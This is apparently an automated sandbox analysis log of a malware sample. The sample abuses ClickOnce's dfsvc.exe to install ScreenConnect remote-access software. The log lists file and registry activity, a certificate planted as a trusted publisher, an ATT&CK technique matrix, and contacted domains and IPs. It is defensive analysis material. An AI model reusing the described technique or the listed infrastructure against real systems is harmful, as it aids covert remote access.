                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.ClientService.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.WindowsBackstageShell.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.WindowsFileManager.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.WindowsClient.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.WindowsFileManager.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\31PP32JW.PQZ\BO7AZ65A.7B3\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe; Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe; Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe; Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe; Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe; Code function: 0_2_00621807 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00621807
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: Amcache.hve.13.dr; Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.13.dr; Binary or memory string: msmpeng.exe
                  Source: Amcache.hve.13.dr; Binary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.13.dr; Binary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe; Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob
                  Source: Yara match; File source: 9.0.ScreenConnect.WindowsClient.exe.510000.0.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 00000009.00000000.1412836393.0000000000512000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000001.00000002.3055864006.000001D2D9943000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000001.00000002.3054816957.000001D2D980A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000009.00000002.1871815455.000000000286A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000001.00000002.3043338622.000001D2BF15F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: Process Memory Space: dfsvc.exe PID: 8124, type: MEMORYSTR
                  Source: Yara match; File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 5580, type: MEMORYSTR
                  Source: Yara match; File source: Process Memory Space: ScreenConnect.ClientService.exe PID: 7636, type: MEMORYSTR
                  Source: Yara match; File source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exe, type: DROPPED
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 21 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 12 Command and Scripting Interpreter | 1 DLL Search Order Hijacking | 1 DLL Search Order Hijacking | 1 Obfuscated Files or Information | LSASS Memory | 2 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 1 Windows Service | 1 Windows Service | 1 Install Root Certificate | Security Account Manager | 14 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | 1 Scheduled Task/Job | 12 Process Injection | 1 Timestomp | NTDS | 41 Security Software Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | 1 Bootkit | 1 Scheduled Task/Job | 1 DLL Side-Loading | LSA Secrets | 1 Process Discovery | SSH | Keylogging | 3 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Search Order Hijacking | Cached Domain Credentials | 41 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Modify Registry | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 41 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 12 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
| Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 1 Hidden Users | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption |
| Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 1 Bootkit | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking |
Behavior Graph (ID: 1638477; Sample: SecuriteInfo.com.W32.Lolbas...; Startdate: 14/03/2025; Architecture: WINDOWS; Score: 51)

DNS/IP info: www.qmhelp.top; miledin.mwhelp.site; bg.microsoft.map.fastly.net
Signatures: Multi AV Scanner detection for submitted file; .NET source code references suspicious native API functions; Detected potential unwanted application; Contains functionality to hide user accounts

Process tree:
SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe (2) started
  dfsvc.exe (130, 106) started
    DNS/IP: www.qmhelp.top 172.67.181.28, 443, 49722, 49725 CLOUDFLARENETUS United States
    Dropped: C:\...\ScreenConnect.WindowsFileManager.exe, PE32
    Dropped: C:\Users\...\ScreenConnect.WindowsClient.exe, PE32
    Dropped: ScreenConnect.WindowsBackstageShell.exe, PE32
    Dropped: 13 other files (none is malicious)
    ScreenConnect.WindowsClient.exe (19, 12) started
      DNS/IP: miledin.mwhelp.site 62.182.86.171, 63082, 8880 YANINA-ASUA Ukraine
      Signature: Contains functionality to hide user accounts
      ScreenConnect.ClientService.exe (2, 2) started
        Signatures: Contains functionality to hide user accounts; Reads the Security eventlog; Reads the System eventlog
        WerFault.exe (21, 16) started
  WerFault.exe started
